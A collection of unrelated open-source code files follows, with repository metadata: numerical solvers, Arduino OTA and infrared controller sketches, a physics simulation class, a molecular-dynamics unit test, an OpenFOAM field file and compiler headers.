r1.RHS[i].v; } SolveBlockTri(LHS, RHS, NRows); //mv and write over flux n for (i = 1; i < NRows-1; i++) { myarray.f1[i][j].P = RHS[i][0]; myarray.f1[i][j].u = RHS[i][1]; myarray.f1[i][j].v = RHS[i][2]; } } //-----------------------------Solve BT for Cols-------------------------------// void solve_block_thomas(carray & myarray, ccol & r1, int NRows, int i, double & mdiff) { double LHS[MAXSIZE][3][3][3], RHS[MAXSIZE][3]; double tomp = 0; int j; //|row|col for (j = 0; j < NRows; j++) { //A LHS[j][0][0][0] = r1.LHS[j].Ay.rP.P; LHS[j][0][0][1] = r1.LHS[j].Ay.ru.P; LHS[j][0][0][2] = r1.LHS[j].Ay.rv.P; LHS[j][0][1][0] = r1.LHS[j].Ay.rP.u; LHS[j][0][1][1] = r1.LHS[j].Ay.ru.u; LHS[j][0][1][2] = r1.LHS[j].Ay.rv.u; LHS[j][0][2][0] = r1.LHS[j].Ay.rP.v; LHS[j][0][2][1] = r1.LHS[j].Ay.ru.v; LHS[j][0][2][2] = r1.LHS[j].Ay.rv.v; //B LHS[j][1][0][0] = r1.LHS[j].By.rP.P; LHS[j][1][0][1] = r1.LHS[j].By.ru.P; LHS[j][1][0][2] = r1.LHS[j].By.rv.P; LHS[j][1][1][0] = r1.LHS[j].By.rP.u; LHS[j][1][1][1] = r1.LHS[j].By.ru.u; LHS[j][1][1][2] = r1.LHS[j].By.rv.u; LHS[j][1][2][0] = r1.LHS[j].By.rP.v; LHS[j][1][2][1] = r1.LHS[j].By.ru.v; LHS[j][1][2][2] = r1.LHS[j].By.rv.v; //C LHS[j][2][0][0] = r1.LHS[j].Cy.rP.P; LHS[j][2][0][1] = r1.LHS[j].Cy.ru.P; LHS[j][2][0][2] = r1.LHS[j].Cy.rv.P; LHS[j][2][1][0] = r1.LHS[j].Cy.rP.u; LHS[j][2][1][1] = r1.LHS[j].Cy.ru.u; LHS[j][2][1][2] = r1.LHS[j].Cy.rv.u; LHS[j][2][2][0] = r1.LHS[j].Cy.rP.v; LHS[j][2][2][1] = r1.LHS[j].Cy.ru.v; LHS[j][2][2][2] = r1.LHS[j].Cy.rv.v; RHS[j][0] = r1.RHS[j].P; RHS[j][1] = r1.RHS[j].u; RHS[j][2] = r1.RHS[j].v; } SolveBlockTri(LHS, RHS, NRows); for (j = 1; j < NRows-1; j++) { tomp = (abs(RHS[j][0]) + abs(RHS[j][1]) + abs(RHS[j][2]))/3.0; if(tomp > mdiff) mdiff = tomp; } //change in solution saved for (j = 1; j < NRows-1; j++) { myarray.f1[i][j].P = RHS[j][0]; myarray.f1[i][j].u = RHS[j][1]; myarray.f1[i][j].v = RHS[j][2]; } } //==========================================================================// //--------------------implicit wall boundaries------------------------------// //==========================================================================// //set in this way for debugging ie easy to see void set_wall(LHScX & temp, int par) { if(par == 1){ temp.Ax.rP.P = 0.; temp.Ax.rP.u = 0.; temp.Ax.rP.v = 0.; temp.Ax.ru.P = 0.; temp.Ax.ru.u = 0.; temp.Ax.ru.v = 0.; temp.Ax.rv.P = 0.; temp.Ax.rv.u = 0.; temp.Ax.rv.v = 0.; temp.Bx.rP.P = 1.; temp.Bx.rP.u = 0.; temp.Bx.rP.v = 0.; temp.Bx.ru.P = 0.; temp.Bx.ru.u = 1.; temp.Bx.ru.v = 0.; temp.Bx.rv.P = 0.; temp.Bx.rv.u = 0.; temp.Bx.rv.v = 1.; temp.Cx.rP.P = -1.; temp.Cx.rP.u = 0.; temp.Cx.rP.v = 0.; temp.Cx.ru.P = 0.; temp.Cx.ru.u = 1.; temp.Cx.ru.v = 0.; temp.Cx.rv.P = 0.; temp.Cx.rv.u = 0.; temp.Cx.rv.v = 1.0; } if(par == 0){ temp.Ax.rP.P = -1.; temp.Ax.rP.u = 0.; temp.Ax.rP.v = 0.; temp.Ax.ru.P = 0.; temp.Ax.ru.u = 1.; temp.Ax.ru.v = 0.; temp.Ax.rv.P = 0.; temp.Ax.rv.u = 0.; temp.Ax.rv.v = 1.; temp.Bx.rP.P = 1.; temp.Bx.rP.u = 0.; temp.Bx.rP.v = 0.; temp.Bx.ru.P = 0.; temp.Bx.ru.u = 1.; temp.Bx.ru.v = 0.; temp.Bx.rv.P = 0.; temp.Bx.rv.u = 0.; temp.Bx.rv.v = 1.; temp.Cx.rP.P = 0.; temp.Cx.rP.u = 0.; temp.Cx.rP.v = 0.; temp.Cx.ru.P = 0.; temp.Cx.ru.u = 0.; temp.Cx.ru.v = 0.; temp.Cx.rv.P = 0.; temp.Cx.rv.u = 0.; temp.Cx.rv.v = 0.; } } void set_wall(LHScY & temp, int par) { if(par == 1){ temp.Ay.rP.P = 0.; temp.Ay.rP.u = 0.; temp.Ay.rP.v = 0.; temp.Ay.ru.P = 0.; temp.Ay.ru.u = 0.; temp.Ay.ru.v = 0.; temp.Ay.rv.P = 0.; temp.Ay.rv.u = 0.; temp.Ay.rv.v = 0.; temp.By.rP.P = 1.; temp.By.rP.u = 0.; temp.By.rP.v = 0.; temp.By.ru.P = 0.; temp.By.ru.u = 1.; temp.By.ru.v = 0.; temp.By.rv.P = 0.; temp.By.rv.u = 0.; temp.By.rv.v = 1.; temp.Cy.rP.P = -1.; temp.Cy.rP.u = 0.; temp.Cy.rP.v = 0.; temp.Cy.ru.P = 0.; temp.Cy.ru.u = 1.; temp.Cy.ru.v = 0.; temp.Cy.rv.P = 0.; temp.Cy.rv.u = 0.; temp.Cy.rv.v = 1.0; } if(par == 0){ temp.Ay.rP.P = -1.; temp.Ay.rP.u = 0.; temp.Ay.rP.v = 0.; temp.Ay.ru.P = 0.; temp.Ay.ru.u = 1.; temp.Ay.ru.v = 0.; temp.Ay.rv.P = 0.; temp.Ay.rv.u = 0.; temp.Ay.rv.v = 1.; temp.By.rP.P = 1.; temp.By.rP.u = 0.; temp.By.rP.v = 0.; temp.By.ru.P = 0.; temp.By.ru.u = 1.; temp.By.ru.v = 0.; temp.By.rv.P = 0.; temp.By.rv.u = 0.; temp.By.rv.v = 1.; temp.Cy.rP.P = 0.; temp.Cy.rP.u = 0.; temp.Cy.rP.v = 0.; temp.Cy.ru.P = 0.; temp.Cy.ru.u = 0.; temp.Cy.ru.v = 0.; temp.Cy.rv.P = 0.; temp.Cy.rv.u = 0.; temp.Cy.rv.v = 0.; } }
67f650eb09a8a15fb13e9e270bf4254dc3f80704
f80af86cad57bf091d27e89052214ca29d3b3a16
/3rd Year/2nd Semester/Computação Gráfica/Trabalho Prático/Fase 4/Gerador/anel.h
6d329ca6400517347cea9f26a82f5142b75b8f5e
[]
no_license
diogoesnog/MIEI
44719dce30177ae877b2bdb90ec73a606e64ce63
322b03a561937be91af7158be888227bae75f5c4
refs/heads/master
2022-08-20T14:34:37.136699
2022-07-27T22:08:23
2022-07-27T22:08:23
249,830,783
6
0
null
null
null
null
UTF-8
C++
false
false
260
h
#ifndef anel_h #define anel_h #include <string> using namespace std; void anel(float raioFora, float raioDentro, int fatias, int aneis, string nomeFicheiro); void anelVBO(float raioFora, float raioDentro, int fatias, int aneis, string nomeFicheiro); #endif
4248aa369ff98c0146147c8c4e1cdcc910ed51e5
0f2825ff6fb69d7b6553401ddd8ce4960da7be82
/rd-cpp/src/rd_framework_cpp/src/main/base/ISerializersOwner.cpp
76890cfeba7456f63d5ea98fbd104721e6122ab3
[ "Apache-2.0" ]
permissive
Bhanditz/rd
f02c79b9874878b2d55aa3e6af0995d16aa218d1
5d8282c3fdbcc9a70d4b695c2cb2c89d34787a66
refs/heads/master
2023-04-12T16:53:04.061330
2019-01-31T16:27:13
2019-01-31T16:27:13
168,948,909
0
0
Apache-2.0
2019-02-03T13:35:33
2019-02-03T13:35:33
null
UTF-8
C++
false
false
388
cpp
// // Created by jetbrains on 19.11.2018. // #include "ISerializersOwner.h" #include "Protocol.h" void ISerializersOwner::registry(Serializers const &serializers) { // val key = this::class // if (!serializers.toplevels.add(key)) return //todo // Protocol::initializationLogger.trace("REGISTER serializers for ${key.simpleName}"); registerSerializersCore(serializers); }
75688882b44bd931305a1073daa1723c72c51b15
19194c2f2c07ab3537f994acfbf6b34ea9b55ae7
/android-33/android/renderscript/Element_Builder.def.hpp
e23258845ea07d8ad35718974b3e2fab5c21f3dc
[ "GPL-3.0-only" ]
permissive
YJBeetle/QtAndroidAPI
e372609e9db0f96602da31b8417c9f5972315cae
ace3f0ea2678967393b5eb8e4edba7fa2ca6a50c
refs/heads/Qt6
2023-08-05T03:14:11.842336
2023-07-24T08:35:31
2023-07-24T08:35:31
249,539,770
19
4
Apache-2.0
2022-03-14T12:15:32
2020-03-23T20:42:54
C++
UTF-8
C++
false
false
909
hpp
#pragma once #include "../../JObject.hpp" namespace android::renderscript { class Element; } namespace android::renderscript { class RenderScript; } class JString; namespace android::renderscript { class Element_Builder : public JObject { public: // Fields // QJniObject forward template<typename ...Ts> explicit Element_Builder(const char *className, const char *sig, Ts...agv) : JObject(className, sig, std::forward<Ts>(agv)...) {} Element_Builder(QJniObject obj) : JObject(obj) {} // Constructors Element_Builder(android::renderscript::RenderScript arg0); // Methods android::renderscript::Element_Builder add(android::renderscript::Element arg0, JString arg1) const; android::renderscript::Element_Builder add(android::renderscript::Element arg0, JString arg1, jint arg2) const; android::renderscript::Element create() const; }; } // namespace android::renderscript
1037eab38b0c29dcdfe2407db965b5d90b591714
7dacf71ffccedd8894965f167173194ddd139e6f
/arduinoOTA.ino
06812aee6571252ac58e10a874d18199dc5efd08
[]
no_license
yakumo-saki/EnvBoyMQTT
024b576f0849fb57752e582bb1c689009a843d2d
59fc2f8fb3d9593d25a79aa1f3cc4a30955b70c6
refs/heads/master
2020-04-29T09:04:41.184730
2019-11-01T06:49:10
2019-11-01T06:49:10
176,010,688
0
0
null
null
null
null
UTF-8
C++
false
false
1,606
ino
#include <ESP8266WiFi.h> #include <ESP8266mDNS.h> #include <WiFiUdp.h> #include <ArduinoOTA.h> void setup_ota(String name) { // Port defaults to 8266 // ArduinoOTA.setPort(8266); // Hostname defaults to esp8266-[ChipID] ArduinoOTA.setHostname(name.c_str()); // No authentication by default // ArduinoOTA.setPassword("admin"); // Password can be set with it's md5 value as well // MD5(admin) = 21232f297a57a5a743894a0e4a801fc3 // ArduinoOTA.setPasswordHash("21232f297a57a5a743894a0e4a801fc3"); ArduinoOTA.onStart([]() { String type; if (ArduinoOTA.getCommand() == U_FLASH) { type = "sketch"; } else { // U_SPIFFS type = "filesystem"; } // NOTE: if updating SPIFFS this would be the place to unmount SPIFFS using SPIFFS.end() Serial.println("Start updating " + type); }); ArduinoOTA.onEnd([]() { Serial.println("\nEnd"); }); ArduinoOTA.onProgress([](unsigned int progress, unsigned int total) { Serial.printf("Progress: %u%%\r", (progress / (total / 100))); }); ArduinoOTA.onError([](ota_error_t error) { Serial.printf("Error[%u]: ", error); if (error == OTA_AUTH_ERROR) { Serial.println("Auth Failed"); } else if (error == OTA_BEGIN_ERROR) { Serial.println("Begin Failed"); } else if (error == OTA_CONNECT_ERROR) { Serial.println("Connect Failed"); } else if (error == OTA_RECEIVE_ERROR) { Serial.println("Receive Failed"); } else if (error == OTA_END_ERROR) { Serial.println("End Failed"); } }); ArduinoOTA.begin(); } void loop_ota() { ArduinoOTA.handle(); }
49f26e82375cd95513482b6b3db2af8912a6bd34
0913116c6530c22abf08da54214c19640dbdda04
/BouncingBalls/BouncingBalls/Ball.cpp
1205456360bd209926c80300d2a8155f49b6df2a
[]
no_license
amoonfana/CPPLibrary
e176f9a068d875f28766cfc89a297043e71eda1e
48f5b73e1a3bb9032eaa0d476bae1878783ecf7f
refs/heads/master
2021-07-10T04:36:09.277894
2019-01-03T03:29:23
2019-01-03T03:29:23
132,719,016
0
0
null
null
null
null
UTF-8
C++
false
false
1,608
cpp
#include <algorithm> #include "Ball.h" using namespace std; Ball::Ball() { rx = ((double)rand()) / RAND_MAX; ry = ((double)rand()) / RAND_MAX; vx = (((double)rand()) / RAND_MAX - 0.5) / 100; vy = (((double)rand()) / RAND_MAX - 0.5) / 100; r = 0.01; m = 0.5; cnt = 0; } Ball::Ball(double rx1, double ry1, double vx1, double vy1, double r1, double m1) { rx = rx1; ry = ry1; vx = vx1; vy = vy1; r = r1; m = m1; cnt = 0; } void Ball::move(double dt) { rx += vx*dt; ry += vy*dt; } double Ball::time2Hit(Ball* b) { if (this == b) { return LIMIT; } double drx = b->rx - rx, dry = b->ry - ry, dvx = b->vx - vx, dvy = b->vy - vy, dvdr = drx*dvx + dry*dvy; if (dvdr > 0) { return LIMIT; } double dvdv = dvx*dvx + dvy*dvy, drdr = drx*drx + dry*dry, r2 = b->r + r, d = dvdr*dvdr - dvdv * (drdr - r2*r2); if (d < 0) { return LIMIT; } return -(dvdr + sqrt(d)) / dvdv; } void Ball::bounceOff(Ball* b) { double drx = b->rx - rx, dry = b->ry - ry, dvx = b->vx - vx, dvy = b->vy - vy, dvdr = drx*dvx + dry*dvy, r2 = b->r + r, J = 2*b->m*m*dvdr / ((b->m + m)*r2), Jx = J*drx / r2, Jy = J*dry / r2; vx += Jx / m; vy += Jy / m; b->vx -= Jx / b->m; b->vy -= Jy / b->m; cnt += 1; b->cnt += 1; } double Ball::time2HitVWall() { if (vx > 0) { return (1.0 - rx - r) / vx; } if (vx < 0) { return (r - rx) / vx; } return LIMIT; } void Ball::bounceOffVWall() { vx = -vx; cnt += 1; } double Ball::time2HitHWall() { if (vy > 0) { return (1.0 - ry - r) / vy; } if (vy < 0) { return (r - ry) / vy; } return LIMIT; } void Ball::bounceOffHWall() { vy = -vy; cnt += 1; }
910f34c5842ef6e6672ea41d51ddb87cf65eb79e
eaf5e33f701206155a37b90d1a9372895285daa2
/include/RunAction.hh
7987c22386590aa987e6789f427f0a965544e75f
[]
no_license
Clostry/soil-moisture
f050bf65a3dfd732f3295bd6c59a052b9964192b
8cf05a8a31ef89eecd3ea36304cb7d85da0eb55d
refs/heads/master
2021-01-10T17:39:16.523381
2015-12-10T07:41:19
2015-12-10T07:41:19
45,522,595
0
1
null
null
null
null
UTF-8
C++
false
false
668
hh
#ifndef RunAction_h #define RunAction_h 1 #include "G4UserRunAction.hh" #include "globals.hh" //....oooOO0OOooo........oooOO0OOooo........oooOO0OOooo........oooOO0OOooo...... class G4Run; class HistoManager; //....oooOO0OOooo........oooOO0OOooo........oooOO0OOooo........oooOO0OOooo...... class RunAction : public G4UserRunAction { public: RunAction(HistoManager*); ~RunAction(); virtual void BeginOfRunAction(const G4Run*); virtual void EndOfRunAction(const G4Run*); G4int GetCounts(); private: HistoManager* fHistoManager; G4int fCounts; }; //....oooOO0OOooo........oooOO0OOooo........oooOO0OOooo........oooOO0OOooo...... #endif
5a89cbd9c5ce7e4d6325657329c656b5c82b13db
629aa175464d3a52881fd3f38159f5113c291069
/arduino/lib/IRmanager/IRmanager.cpp
123f284b540a50ba69b11582807a6cdb6f963225
[]
no_license
zastrixarundell/phomenix
75ee21e07da50e2d338c71b7f42028483892fdd2
cf284cd4ee1943188283e63252bd3175287594c1
refs/heads/master
2023-06-22T09:56:06.986998
2021-07-18T03:10:55
2021-07-18T03:10:55
291,331,193
1
0
null
2021-07-18T02:31:52
2020-08-29T18:57:06
Elixir
UTF-8
C++
false
false
2,375
cpp
#include "IRmanager.hpp" #include <ESP8266WiFi.h> #include <IRac.h> #include <IRsend.h> #define USING_PROPRIETARY_PRECODE true #if USING_PROPRIETARY_PRECODE uint16_t controlData[227] = {3152, 1522, 564, 1020, 564, 1020, 564, 254, 564, 252, 564, 254, 564, 1020, 564, 252, 566, 254, 564, 1022, 564, 1022, 562, 254, 564, 1020, 564, 254, 562, 254, 564, 1022, 562, 1020, 564, 252, 564, 1018, 566, 1022, 562, 254, 564, 252, 564, 1022, 564, 254, 564, 252, 566, 254, 564, 1020, 564, 252, 564, 254, 564, 254, 564, 252, 564, 254, 566, 252, 564, 254, 564, 254, 564, 252, 564, 254, 564, 254, 564, 254, 564, 252, 564, 254, 564, 252, 566, 254, 564, 252, 566, 252, 566, 254, 564, 252, 566, 1020, 566, 250, 566, 254, 564, 252, 566, 254, 564, 254, 564, 256, 562, 254, 564, 252, 564, 254, 564, 254, 564, 252, 564, 254, 564, 252, 566, 252, 564, 254, 564, 254, 564, 254, 564, 254, 566, 252, 564, 254, 564, 252, 566, 252, 564, 252, 566, 252, 566, 252, 566, 254, 564, 254, 564, 256, 562, 254, 564, 254, 564, 254, 564, 254, 566, 252, 564, 254, 564, 252, 564, 252, 566, 254, 564, 252, 564, 254, 564, 252, 566, 252, 564, 254, 564, 254, 564, 252, 566, 252, 564, 254, 566, 252, 564, 254, 564, 252, 564, 254, 564, 254, 564, 254, 564, 252, 564, 254, 564, 254, 564, 254, 564, 254, 564, 1020, 566, 254, 564, 1020, 564, 254, 564, 254, 566, 1020, 564, 1020, 564, 254, 564}; #endif IRTcl112Ac *ac; IRsend *ir; IRmanager::IRmanager(const int& ledPin) { pinMode(ledPin, OUTPUT); ir = new IRsend(ledPin); ac = new IRTcl112Ac(ledPin); } uint32_t transalteCode(String& code) { return strtoul(code.c_str(), NULL, 10); } void IRmanager::sendRaw(String& rawData) { ir -> sendNEC(transalteCode(rawData)); } void IRmanager::sendACdata(ACdata& acData) { ac -> setPower(acData.power); ac -> setMode(acData.mode); ac -> setTemp(acData.temp); ac -> setFan(acData.fan); ac -> setEcono(acData.eco); ac -> setHealth(acData.health); ac -> setLight(acData.light); ac -> setTurbo(acData.turbo); ac -> setSwingHorizontal(acData.horizontalSwing); ac -> setSwingVertical(acData.verticalSwing); #if USING_PROPRIETARY_PRECODE ir -> sendRaw(controlData, 228, 38); delay(200); #endif ac -> begin(); ac -> send(); }
c49de50b273cf4e16890631c8404739865b590de
1935aa569fafae4a6206998d27102700689fca35
/EliteArduino2/Scooping.ino
8840ad44362a04b0550e6196384c7a13eeca1356
[ "Apache-2.0" ]
permissive
Maxfojtik/EliteDangeriousNeopixelIntegration
72ecc9a86516d59ee3ebd4e56f3bd006db0b62af
451b5fe5bd7f24dcc35a7cbbe5ee452e5f85d5d0
refs/heads/master
2021-06-25T08:28:14.957116
2021-03-21T01:56:37
2021-03-21T01:56:37
185,478,977
0
0
null
null
null
null
UTF-8
C++
false
false
266
ino
void scooping() { readyToSwitch = true; spot -= 4; float off = (spot + 0.0) / 20; for (int i = 0; i < NUM_LEDS; i++) { float val = ((sin((i - off) / 2) + 1) / 2); leds[NUM_LEDS-i] = CRGB((int)(cRed*val), (int)(cGreen*val), (int)(cBlue*val)); } }
37eb808e8b5f3c3d7745348fda81e3492413e6c9
e1f19ef3fcabc6a1588071b2e9b4d7f9fc66fdab
/unit_test/gtest_force_angle.cpp
153d7d492f80fbda93815bb69fb968f5304f3a5d
[ "MIT" ]
permissive
Tokumasu-Lab/md_fdps
788287ecabe250e9e820c89f7f549a8ca19803a7
eb9ba6baa8ac2dba86ae74fa6104a38e18d045ff
refs/heads/master
2021-09-15T04:17:14.602074
2018-05-25T17:30:04
2018-05-25T17:30:04
101,115,294
0
0
null
null
null
null
UTF-8
C++
false
false
7,865
cpp
//*************************************************************************************** // This program is unit test of angle interaction. //*************************************************************************************** #include <gtest/gtest.h> #include <particle_simulator.hpp> #include <particle_mesh.hpp> //--- external library for MD #include <molecular_dynamics_ext.hpp> //--- user defined headers //------ definition of data set #include "unit.hpp" #include "md_enum.hpp" #include "md_defs.hpp" #include "atom_class.hpp" #include "md_coef_table.hpp" //------ calculate interaction #include "md_force.hpp" //------ loading model parameter #include "md_loading_model.hpp" //--- common tool of unit test for force #include "gtest_force_common.hpp" namespace TEST_DEFS { const PS::S32 n_atom = 3; const PS::S64 n_loop = 1000; const PS::F32 range = 2.0*Unit::pi; const MD_DEFS::ID_type id_tgt = 1; const PS::S32 data_field_len = 6; const PS::F32 eps_abs = 1.e-5; const PS::F32 eps_rel = 1.e-6; const std::string harmonic_log_file{"test_bin/force_angle_harmonic_log.dat"}; const std::string harmonic_ref_file{"unit_test/ref/force_angle_harmonic_ref.dat"}; }; template <class Tpsys> void test_move(Tpsys &atom){ for(PS::S64 i=0; i<atom.getNumberOfParticleLocal(); ++i){ PS::F64vec pos_tmp = Normalize::realPos( atom[i].getPos() ); if(atom[i].getAtomID() == 2){ //--- move for angle test auto pos_local = pos_tmp - Normalize::realPos( PS::F64vec{0.5} ); pos_local = VEC_EXT::rot_y(pos_local, TEST_DEFS::range/PS::F64(TEST_DEFS::n_loop)); pos_tmp = pos_local + Normalize::realPos( PS::F64vec{0.5} ); } pos_tmp = Normalize::normPos(pos_tmp); atom[i].setPos(pos_tmp); } } class ForceData { public: PS::S32 count; PS::F32 degree; PS::F32 potential; PS::F32vec force; bool read_line(std::string line){ STR_TOOL::removeCR(line); const auto str_list = STR_TOOL::split(line, " "); if(str_list.size() < TEST_DEFS::data_field_len) return false; if( !STR_TOOL::isInteger(str_list[0]) ) return false; if( !STR_TOOL::isNumeric(str_list[1]) ) return false; if( !STR_TOOL::isNumeric(str_list[2]) ) return false; if( !STR_TOOL::isNumeric(str_list[3]) ) return false; if( !STR_TOOL::isNumeric(str_list[4]) ) return false; if( !STR_TOOL::isNumeric(str_list[5]) ) return false; this->count = std::stoi(str_list[0]); this->degree = std::stof(str_list[1]); this->potential = std::stof(str_list[2]); this->force = PS::F32vec{ std::stof(str_list[3]), std::stof(str_list[4]), std::stof(str_list[5]) }; return true; } }; std::ostream& operator << (std::ostream &s, const ForceData &d){ s << std::setw(10) << d.count << " " << std::setw(15) << std::scientific << std::setprecision(8) << d.degree << " " << std::setw(15) << std::scientific << std::setprecision(8) << d.potential << " " << std::setw(15) << std::scientific << std::setprecision(8) << d.force.x << " " << std::setw(15) << std::scientific << std::setprecision(8) << d.force.y << " " << std::setw(15) << std::scientific << std::setprecision(8) << d.force.z << "\n"; return s; } void check_result(const std::vector<ForceData> &result, const std::vector<ForceData> &ref ){ EXPECT_EQ(result.size(), ref.size()); const PS::S32 n = std::min(result.size(), ref.size()); if(PS::Comm::getRank() == 0){ for(PS::S32 i=0; i<n; ++i){ EXPECT_EQ(result[i].count, ref[i].count) << " i= " << i; EXPECT_FLOAT_EQ(result[i].degree , ref[i].degree ) << " i= " << i; EXPECT_TRUE( float_relative_eq(result[i].potential, ref[i].potential, TEST_DEFS::eps_abs, TEST_DEFS::eps_rel) ) << " i= " << i; EXPECT_TRUE( float_relative_eq(result[i].force.x , ref[i].force.x , TEST_DEFS::eps_abs, TEST_DEFS::eps_rel) ) << " i= " << i; EXPECT_TRUE( float_relative_eq(result[i].force.y , ref[i].force.y , TEST_DEFS::eps_abs, TEST_DEFS::eps_rel) ) << " i= " << i; EXPECT_TRUE( float_relative_eq(result[i].force.z , ref[i].force.z , TEST_DEFS::eps_abs, TEST_DEFS::eps_rel) ) << " i= " << i; } } COMM_TOOL::barrier(); } template <class Tptcl, class Tdata> void test_record(const Tptcl &atom, const PS::S32 count, std::vector<Tdata> &logger){ Atom_FP buf; PS::S32 data_proc = -1; for(PS::S32 i=0; i<atom.getNumberOfParticleLocal(); ++i){ if(atom[i].getAtomID() == TEST_DEFS::id_tgt){ buf = atom[i]; data_proc = PS::Comm::getRank(); } } data_proc = PS::Comm::getMaxValue(data_proc); COMM_TOOL::broadcast(buf, data_proc); logger.push_back( ForceData{count, static_cast<PS::F32>(180.0*(TEST_DEFS::range/Unit::pi)*PS::F32(count)/PS::F32(TEST_DEFS::n_loop)), buf.getPotAngle(), buf.getForceIntra()} ); } class TestForceAngle : public ::testing::Test { public: //--- ParticleSystem object PS::DomainInfo dinfo; PS::ParticleSystem<Atom_FP> atom; CalcForce force; //--- data logger std::vector<ForceData> force_log; std::vector<ForceData> force_ref; virtual void SetUp(){ //--- initialize test_init(TEST_DEFS::n_loop); force_log.clear(); force_ref.clear(); atom.initialize(); atom.setNumberOfParticleLocal(0); } }; TEST_F(TestForceAngle, harmonic){ if(PS::Comm::getRank() == 0){ //--- model parameters std::vector<std::string> param_line; param_line = {"Ow", "Hw", "none"}; MODEL::loading_param_bond(ENUM::what(MolName::AA_wat_SPC_Fw), param_line, MODEL::coef_table.bond); param_line = {"Hw", "Ow", "Hw", "harmonic", "113.24", "75.9"}; MODEL::loading_param_angle(ENUM::what(MolName::AA_wat_SPC_Fw), param_line, MODEL::coef_table.angle); MODEL::coef_table.mask_scaling[MolName::AA_wat_SPC_Fw] = MD_DEFS::MaskList{}; //--- atom settings atom.setNumberOfParticleLocal(TEST_DEFS::n_atom); for(PS::S32 i=0; i<TEST_DEFS::n_atom; ++i){ atom[i].setAtomID(i); atom[i].setMolID(i); atom[i].setMolType( MolName::AA_wat_SPC_Fw ); atom[i].setCharge( 0.0 ); atom[i].setVDW_R( 3.0 ); atom[i].setVDW_D( 0.0 ); atom[i].clear(); } atom[0].setAtomType( AtomName::Ow ); atom[1].setAtomType( AtomName::Hw ); atom[2].setAtomType( AtomName::Hw ); atom[0].bond.add(1); atom[0].bond.add(2); atom[1].bond.add(0); atom[2].bond.add(0); atom[0].setPos( PS::F64vec(0.5) ); atom[1].setPos( PS::F64vec(0.5) + Normalize::normPos( PS::F64vec(1.0, 0.0, 0.0) ) ); atom[2].setPos( PS::F64vec(0.5) + VEC_EXT::rot_y( Normalize::normPos( PS::F64vec(1.0, 0.0, 0.0) ), Unit::pi*113.24/180.0) ); } execute_force_calc(atom, dinfo, force, force_log, force_ref); write_log_file(TEST_DEFS::harmonic_log_file, force_log); load_log_file( TEST_DEFS::harmonic_ref_file, force_ref); check_result(force_log, force_ref); } #include "gtest_main_mpi.hpp"
49a14e9c8b97d1c7db0c26f3f98024f14d75ea93
4c23be1a0ca76f68e7146f7d098e26c2bbfb2650
/ic8h18/0.0025/DC6H13O2H
aeb158ad5049c8e979fd2feda5cc0db52a5092e3
[]
no_license
labsandy/OpenFOAM_workspace
a74b473903ddbd34b31dc93917e3719bc051e379
6e0193ad9dabd613acf40d6b3ec4c0536c90aed4
refs/heads/master
2022-02-25T02:36:04.164324
2019-08-23T02:27:16
2019-08-23T02:27:16
null
0
0
null
null
null
null
UTF-8
C++
false
false
842
/*--------------------------------*- C++ -*----------------------------------*\ ========= | \\ / F ield | OpenFOAM: The Open Source CFD Toolbox \\ / O peration | Website: https://openfoam.org \\ / A nd | Version: 6 \\/ M anipulation | \*---------------------------------------------------------------------------*/ FoamFile { version 2.0; format ascii; class volScalarField; location "0.0025"; object DC6H13O2H; } // * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * // dimensions [0 0 0 0 0 0 0]; internalField uniform 1.66276e-10; boundaryField { boundary { type empty; } } // ************************************************************************* //
d45a0f07da635ec3cd7c575eacde393daf9adc08
fdbc4290dd724a093cb74626ea3c3063b45fa2c7
/osprey1.0/be/opt/opt_fold.h
6697c712328705d6eb36508796d53d7071c39ac2
[]
no_license
sriharikrishna/Open64
fe764dd267f5c0cb040b3eceb2efbda71f8be9be
f9b081e5b22023fafb257694b91a2296fb44c179
refs/heads/master
2020-06-06T05:31:33.901374
2008-06-26T15:48:25
2008-06-26T15:48:25
192,648,234
0
0
null
null
null
null
UTF-8
C++
false
false
6,182
h
//-*-c++-*- // ==================================================================== // ==================================================================== // // Module: opt_fold.h // $Revision: 1.1.1.1 $ // $Date: 2002-05-22 20:06:49 $ // $Author: dsystem $ // $Source: /m_home/m_utkej/Argonne/cvs2svn/cvs/Open64/osprey1.0/be/opt/opt_fold.h,v $ // // Revision history: // 31-MAY-95 dahl - Original Version // // ==================================================================== // // Copyright (C) 2000, 2001 Silicon Graphics, Inc. All Rights Reserved. // // This program is free software; you can redistribute it and/or modify // it under the terms of version 2 of the GNU General Public License as // published by the Free Software Foundation. // // This program is distributed in the hope that it would be useful, but // WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. // // Further, this software is distributed without any warranty that it // is free of the rightful claim of any third person regarding // infringement or the like. Any license provided herein, whether // implied or otherwise, applies only to this software file. Patent // licenses, if any, provided herein do not apply to combinations of // this program with other software, or any other product whatsoever. // // You should have received a copy of the GNU General Public License // along with this program; if not, write the Free Software Foundation, // Inc., 59 Temple Place - Suite 330, Boston MA 02111-1307, USA. // // Contact information: Silicon Graphics, Inc., 1600 Amphitheatre Pky, // Mountain View, CA 94043, or: // // http://www.sgi.com // // For further information regarding this notice, see: // // http://oss.sgi.com/projects/GenInfo/NoticeExplan // // ==================================================================== // // Description: // defines FOLD class and member functions for the interface to // the simplifier called by copy propagation // // ==================================================================== // ==================================================================== #ifndef opt_fold_INCLUDED #define opt_fold_INCLUDED "opt_fold.h" #ifdef _KEEP_RCS_ID static char *opt_foldrcs_id = opt_fold_INCLUDED"$Revision: 1.1.1.1 $"; #endif /* _KEEP_RCS_ID */ #ifndef opt_htable_INCLUDED #include "opt_htable.h" // for CODEREP #endif #ifndef config_INCLUDED #include "config.h" // for Force_IEEE_Comparisons #endif class FOLD { public: FOLD(void); // sets tracing flag // main entry points for folding to a constant CODEREP *Fold_Expr(CODEREP *); // one level CODEREP *Fold_Tree(CODEREP *); // entire tree private: // a pointer is returned #define NOHASH NULL // did nothing #define CONST NULL // folded to a constant // debugging print void Print(const char *, const CODEREP *); // routines to interface to simplifier CODEREP *CR_Simplify_Tree(CODEREP *); CODEREP *CR_Simplify_Expr(CODEREP *); // allow expr simplifier to look one level past CVT and CVTL BOOL check_convert(CODEREP *, CODEREP **, INT); // don't carry along or maintain any maps WN_MAP CR_SimpParentMap(void) { return (WN_MAP)0; } }; // type definitions for wn_simp_code.h, a simpnode is a CODEREP not a WN now typedef CODEREP * simpnode; /* Accessors */ #define SIMPNODE_opcode CR_opcode #define SIMPNODE_operator CR_operator #define SIMPNODE_rtype(x) (x)->Dtyp() #define SIMPNODE_desc(x) (x)->Dsctyp() #define SIMPNODE_load_offset(x) (x)->Offset() 